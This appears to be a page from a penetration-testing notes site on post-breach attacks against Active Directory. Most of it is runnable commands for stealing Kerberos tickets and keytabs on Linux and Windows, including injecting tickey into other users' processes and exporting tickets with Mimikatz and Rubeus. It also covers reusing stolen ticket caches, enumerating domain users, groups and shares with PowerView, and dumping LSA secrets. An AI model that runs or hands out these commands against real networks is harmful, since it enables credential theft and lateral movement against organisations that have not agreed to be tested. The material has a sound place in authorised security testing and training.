Active Directory

This section mean you have an access to computer that connected to AD. This mean we assume breach on that computer.

Enumerate Juicy Info

Harvest tickets from Linux

Check type and location of tickets:

grep default_ccache_name /etc/krb5.conf

If none return, default is FILE:/tmp/krb5cc_%{uid}.

In case of file tickets, you can copy-paste (if you have permissions) for use them.

In case of being KEYRING tickets, you can use tickey to get them:

# To dump current user tickets, if root, try to dump them all by injecting in other user processes
# to inject, copy tickey in a reachable folder by all users
cp tickey /tmp/tickey
/tmp/tickey -i

Harvest tickets from Windows

With Mimikatz:

mimikatz # sekurlsa::tickets /export

With Rubeus in Powershell:

.\Rubeus dump

# After dump with Rubeus tickets in base64, to write the in a file
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<bas64_ticket>"))

reference:

https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a

krb5.keytab

extract with this -> https://github.com/sosdave/KeyTabExtract/blob/master/keytabextract.py

# Linux cache kerberost ticket

find / -type f -iname "krb5.keytab" 2>/dev/null
find / -type f -iname "krb5cc_*" 2>/dev/null



# Windows cache kerberost ticket

dir "\krb5*.keytab" /s
dir "\krb5cc_*" /s

if you found the krb5cc_* file, just export it to env variable KRB5CCNAME then check with klist

export KRB5CCNAME=/tmp/krb5cc*
klist

# if imported it mean you able to auto logon without password

python3 GetADUsers.py -all -k -no-pass -dc-ip 172.16.x.y <domain>/<username>

PowerView

Import module

powershell -ep bypass
[PS] . .\PowerView.ps1

The Domain Users

Get-NetUser | select cn

# dump the interesting info
Get-NetUser | select cn,lastlogon,logoncount,memberof

The Domain Groups

Get-NetGroup -GroupName *admin*

The Shared Folder

Invoke-SharedFinder

Note: Default shared folder:

ADMIN$
C$
IPC$
NETLOGON
SYSVOL

Net Computer

Get-NetComputer -FullData
Get-NetComputer -FullData |select operatingsystem

Mimikatz

note: must run as administrator

mimikats.exe

privilege::debug
lsadump::lsa /patch
PreviousPost ExploitNextKerberos

Last updated